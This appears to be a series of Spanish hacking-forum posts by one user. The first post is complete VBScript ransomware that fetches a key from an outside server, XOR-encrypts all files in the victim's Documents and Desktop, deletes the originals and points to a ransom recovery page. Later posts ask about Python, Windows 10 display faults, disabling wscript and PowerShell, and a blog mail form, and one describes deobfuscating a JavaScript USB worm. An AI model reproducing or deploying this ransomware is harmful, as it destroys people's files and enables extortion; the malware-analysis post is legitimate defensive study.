Hola amigos aqui con un pequeño código que se me ocurrió hace unos días como cuando no hay nada que hacer y solo te vienen ideas de como joder mas al mundo jajajaja

Y me bino ala mente de crear un código en VBScript(ya que me gusta mas por su dificultad de detección por los AV) tipo ransomware

bueno así que ni mas ni menos aquí el código

option explicit
dim shell,fso,document,f,password,desktop,id
 
set shell = createobject("wscript.shell")
set fso = createobject("scripting.filesystemobject")
 
document = shell.SpecialFolders("MyDocuments")
desktop = shell.SpecialFolders("Desktop")
 
set f = fso.getfolder(document)
id = f.drive.serialnumber 
 
password = Contrasena(id)
 
cifrar(document)
cifrar(desktop)
 
msgbox "Para Recuperar Tus Archivos Ingresa a La Direccion:" & vbcrlf & vbcrlf & "http://practicashacking.net23.net/ransomware/Recover.php" & vbcrlf & vbcrlf & "Tu ID Es: " & id,,"Programa Finalizado" 
 
function Contrasena(id)
  dim objhttp
  Set objhttp = createobject("Microsoft.XmlHttp")
 
  objhttp.open "POST","http://practicashacking.net23.net/ransomware/index.php",false
  objhttp.setRequestHeader "Content-type", "application/x-www-form-urlencoded"
  objhttp.send "id=" & id
 
  Contrasena = objhttp.responsetext
end function
 
function cifrar(ruta)
   dim carpeta,listfiles,listfolders,f
 
   set carpeta = fso.getfolder(ruta)
   set listfolders = carpeta.subfolders
   set listfiles = carpeta.files
 
   for each f in listfiles
      archivo(f.path)
   next 
 
   for each f in listfolders
      cifrar(f.path)
   next   
end function
 
function archivo(path)
   dim file,largo,i,f,b,p,n
 
   set file = fso.getfile(path)
 
   largo=file.size 
 
   set f = file.OpenAsTextStream()
   redim bytes(largo)
 
   n = 1 
 
   for i=0 to largo - 1
      if n = len(password) then 
	     n = 1
	  else
         n = n + 1	  
      end if	  
	  p = asc(mid(password,n,1))
      b = asc(f.read(1)) xor p
	  bytes(i) = chr(b)
   next 
 
   f.close  
 
   set f = fso.createtextfile(file.path & ".crypt") 
 
   for n = 0 to i - 1
      f.write(bytes(n))
   next
 
   f.close 
   file.delete
end function
 
 

saludos Flamer

hola navegando en internet encontré esto:

http://www.mysql-password.com/database/200308

alguien de ustedes ya la había visitado o sabían algo

saludos flamer

hola soy nuevo en este tema de python he reducido mi programa hasta llegar a tener una sola linea que es la que me marca el error esta

print ord("A")
 

hay me deberá de imprimir el 65 pero en ves de eso me marca error no en tiendo el por que

saludos flamer y podría ser la version o no funsina la el comando ord en windows, aclaro nunca había usado python

hola amigos este tema lo expongo aquí porque el problema lo he estado presentando desde que actualice el windows 10.

sucede que cada cierto tiempo ya sea una hora o 2 e incluso hay veces que a los 5 minutos sucede que se apaga como 2 segundos y vuelve a prender la pantalla, pero no se pierde nada, ni se cierra ningún programa sigo en el navegador u otro programa que este utilizando.

no se si sea fallo de hardware no lo creo, ya que esto me a estado sucediendo desde que actualice windows 10

saludos flamer y tal ves sea hardware ya que últimamente se me a ido mucho la luz, pero que se dañaria

hola estoy tratando de crear un archivo similar a este


http://www.mediafire.com/download/qyors7vpzr9atju/flamer.rar

es la foto de flamer le he borrado la extensión y lo remplace por puntos y cuando la descomprimen se crea el archivo flamer.....

y mi pregunta es como logro hacer el archivo flamer......    sin nesesidad del winrar y en un lenguaje de programación

intente esto en vb.net

FileCopy("e:\flamer.jpg", "e:\flamer....")
 

pero nada

saludos

hola amigos me e topado con un problema, es que hace poco publique en mi blog un articulo de como protegernos de los virus vbs y js donde explico como deshabilitar el wscript y de paso quise deshabilitar el powershell pero párese que este no hay forma de detenerlo y primero lo siguiente:

Cree la siguiente cadena en el registro

con eso ya no se ejecuta powershell si ledas doble clic al EXE o si existe un acceso directo a el

pero si pones en el cmd


o

este se lograba ejecutar.

pero para eso borre a powershell de las variables del sistema %PATH% y al querer ejecutar la sentencia anterior ahora si me decía acceso denegado.

hasta hay todo paresia bien, pero después me tope con otra cosa que si tecleas solo la ruta en el cmd de powershell este se logra ejecutar


ya intente denegar permisos, directamente desde el archivo y no pude modificar nada.

luego lo intente con el comando icacls ejecutando el cmd como administrador tampoco tuve éxito me dice acceso denegado


Nota: es solo para probar si se puede deshabilitar

saludos Flamer y alguna opción tengo windows 10

Hola compañeros tengo una duda y el problema es este.

quiero poner un formulario así en mi blog



y crear 1 o 2 cuentas de correo de gmail y que los usuarios puedan mandar mail desde ella

mi pregunta es que si no me bloquearan las cuentas o me cierren el blog

saludos Flamer y no se preocupen de como lo voy hacer

hola compañeros me surgió una duda ya que como hay muchos malwares en formatos vbs y js, mi pregunta es que tan importante es el archivo Wscript.exe de windows ya que he leído que se puede impedir la ejecución de estos archivos modificando el registro


y creamos una nuevo valor de cadena llamado Enabled=0

pero mi duda es que impacto tendria en el usuario, en el sistema no creo que suseda mucho.

pero al usuario se le limitarían muchas o pocas cosas

saludos

Ase poco un amigo me presto su USB para pasarle unos archivos y al ponerla en mi computadora me salto el antivirus y era por que tenia varios accesos directos en ella, bueno decidí  he charle manos a la obra y busque la ubicación del virus en la memoria para ver si podía jugar un rato con el y descubrí que era un archivo .js , orale dije ya dejaron de usar el vbscript y se cambiaron a javascript jajajaja.

yo pienso que se cambiaron para hacer las cosas un poco mas difíciles y si mi fuerte no es javascript pero verde no estoy, así que decidí abrir el archivo con el notepad++ (Descargar aquí sino lo tienen: https://notepad-plus-plus.org/ ) y esto fue lo que me encontre:

http://paste.ofcode.org/h4iyPUuPn5xMWsrbvPLijy

al verlo me pareció complicado de entender pero después de un rato di con el truco.
remplace las ultimas lineas por estas:

var P = this, r = String, N = "\len\gt\h";
var e = function(l) {
  return parseInt(l, 31)
}, p = function (S) {
  return e(S[0]) ^ e(S[1])
};
var v = [];
var z = "";
var Q = "fr\o\m\C\h\ar\C\o\d\e";
for (var y = 0; y < b[N] / 3; y++) v[y] = "";
for (var S = 0; S < b[N]; S++) v[Math.floor(S / 3)] += b[S];
for (var J = 0; J < v[N];) z +=  String.fromCharCode(p([v[J++], v[J++]]));
 
 
 var fso  = new ActiveXObject("Scripting.FileSystemObject"); 
 var fh = fso.CreateTextFile("Test.js", true); 
 fh.WriteLine(z); 
 fh.Close(); 
//P["\Fun\ct\i\on"](z)();
 

la ultima linea que puse como comentario es la que ejecutaba todo el código desde una función, así que la deje como comentario y la variable z es la que portaba todo el código ya descifrado y para no desaprovechar el contenido de la variable z cree un archivo llamado Test.js para que se aguardara el código en el cuando se ejecutara.

al ejecutar el script me creo el archivo Test.js con todo el código descifrado, pero con la diferencia de que todo estaba desordenado, así que me fui a una pagina para que me lo ordenara un poco esta es la web:

http://jsbeautifier.org/

solo pegue el código y le di clic al boton   Beautify javascript or HTML

y el resultado fue este:

http://paste.ofcode.org/5JWR5RLzh5ZkcLixGgLuBb

bueno  hay que remplazar unas comas por punto y coma, no esta al  %100 pero estaba peor y como dije el jscript no es mi fuerte así que no lo explicare ya que hay muchas cosas que no entiendo.

bueno saludo Flamer y espero le sirva a alguien

hola amigos solo vengo de paso y no entiendo que esta mal bueno primero antes que nada aquí el canal de youtube

https://www.youtube.com/channel/UCQpNu7s6Gb1eG8tuNylXKQA/videos?shelf_id=0&view=0&sort=dd

ahora seleccionen cualquier vídeo y luego solo den hacia atrás y seleccionen otro nuevo

y díganme si les a párese el mismo vídeo

creo que cambiaron el video original por ese mismo ya que el enlace no es el mismo pero el video si

saludos flamer y hackearian ese canal o es mi pc pero ya borre todo el historial